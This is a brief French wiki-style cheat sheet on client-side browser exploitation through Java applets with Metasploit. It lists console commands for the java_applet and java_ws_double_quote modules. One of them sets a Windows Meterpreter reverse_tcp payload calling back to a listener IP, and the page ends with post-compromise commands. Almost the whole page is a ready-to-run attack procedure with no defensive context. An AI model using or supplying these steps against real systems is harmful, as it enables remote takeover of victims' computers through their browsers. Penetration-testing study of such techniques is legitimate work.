Java exploit
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| Domaine | Exploitation navigateur (applet Java) |
| Modules | java_applet, java_ws_double_quote
|
| Contexte | Metasploit |
| Voir aussi | Browser autopwn · Aurora |
Exploitation côté client via des applets Java servies au navigateur de la cible.
Procédure — applet Java générique
msfconsole
use exploit/java_applet
show options
set LHOST 192.168.0.10
show options
run
Procédure — Java Web Start
use exploit/windows/browser/java_ws_double_quote
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit
Après ouverture de la session :
getuid
sysinfo